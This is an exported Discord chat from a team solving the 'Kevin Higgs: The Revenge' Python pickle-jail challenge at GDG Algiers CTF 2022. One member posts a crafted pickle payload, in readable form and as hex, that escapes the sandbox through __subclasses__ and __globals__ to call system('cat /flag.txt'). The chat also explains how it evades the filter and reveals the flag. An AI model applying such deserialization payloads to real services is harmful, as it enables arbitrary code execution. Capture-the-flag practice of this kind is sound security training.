Guild icon
Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-jail-kevin-higgs-the-revenge
Avatar
Sutx BOT 10/07/2022 11:00 AM
Kevin Higgs: The Revenge - 500 points
Category: Jail Description: > Putting a number of twists to the original challenge from Angstrom CTF 2022 by Aplet123!
Can you get out of this pickle?
Author : chenx3n Files:Tags: python, jail
10/07/2022 11:00 AM
Sutx pinned a message to this channel. 10/07/2022 11:00 AM
Avatar
sahuang 10/07/2022 4:02 PM
https://ctftime.org/writeup/33666
CTFtime.org / ångstromCTF 2022 / Kevin Higgs / Writeup
CTF writeups, Kevin Higgs
Avatar
crazyman ai 10/07/2022 5:50 PM
anyone worked on it?
Avatar
sahuang 10/07/2022 5:50 PM
not yet
Avatar
crazyman ai 10/07/2022 5:50 PM
XD
Avatar
Sutx BOT 10/07/2022 5:54 PM
@crazyman ai wants to collaborate 🤝
Avatar
Sutx BOT 10/07/2022 7:25 PM
@Violin wants to collaborate 🤝
Avatar
crazyman ai 10/07/2022 7:25 PM
hey @Violin
19:25
>>> lepickle = b'''\x80\x04cempty ... empty ... }V__name__ ... cempty ... __class__.__base__ ... sbcempty ... empty ... }V__name__ ... cempty ... __name__.__subclasses__ ... (tRsbcempty ... empty ... }V__name__ ... cempty ... __name__.__getitem__ ... (I138 ... tRsbcempty ... empty ... }V__name__ ... cempty ... __name__.__init__ ... sbcempty ... empty ... }V__name__ ... cempty ... __name__.__globals__ ... sbcempty ... empty ... }V__name__ ... cempty ... __name__.get ... (Vsystem ... tRsbcempty ... __name__ ... (Vcat /flag.txt ... tR.'''.hex() >>> print(lepickle) 800463656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f636c6173735f5f2e5f5f626173655f5f0a736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f737562636c61737365735f5f0a287452736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f6765746974656d5f5f0a28493133380a7452736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f696e69745f5f0a736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f676c6f62616c735f5f0a736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e6765740a285673797374656d0a7452736263656d7074790a5f5f6e616d655f5f0a2856636174202f666c61672e7478740a74522e
19:26
it's now my payload
Avatar
Violin 10/07/2022 7:26 PM
oh hey
Avatar
crazyman ai 10/07/2022 7:26 PM
But i don't know what has be banned XD
Avatar
Avatar
sahuang
https://ctftime.org/writeup/33666
sahuang 10/07/2022 7:28 PM
this was the old one
Avatar
crazyman ai 10/07/2022 7:28 PM
yeah
19:29
it's my payload of old one
19:29
and it can bypass if module == "empty" and name.count(".") <= 1 and "setattr" not in name and "setitem" not in name:
Avatar
Violin 10/07/2022 7:32 PM
(Vcat /flag.txt not work, can you try (Vopen /flag.txt ?
19:32
and read it?
Avatar
crazyman ai 10/07/2022 7:41 PM
yeah
Avatar
Violin 10/07/2022 7:41 PM
CyberErudites{wOw_L3T$_CR0wn_THe_nEw_pIcKle_Ch4MP1On}
Avatar
crazyman ai 10/07/2022 7:41 PM
cool
Avatar
Avatar
sahuang
https://ctftime.org/writeup/33666
Violin 10/07/2022 7:42 PM
gg, thanks
Avatar
crazyman ai 10/07/2022 7:42 PM
what payload did u work?
Avatar
Avatar
Violin
used /ctf solve
Sutx BOT 10/07/2022 7:42 PM
✅ Challenge solved.
Avatar
Avatar
sahuang
https://ctftime.org/writeup/33666
Violin 10/07/2022 7:43 PM
this payload 🤣
Avatar
crazyman ai 10/07/2022 7:43 PM
😂
19:44
so setattr can't ban setattr >
Avatar
sahuang 10/07/2022 7:44 PM
🤣
Avatar
crazyman ai 10/07/2022 7:47 PM
but It seems not worked for me
19:47
XD
19:47
Image attachment
19:48
@Violin u challenge setattr?
Exported 33 message(s)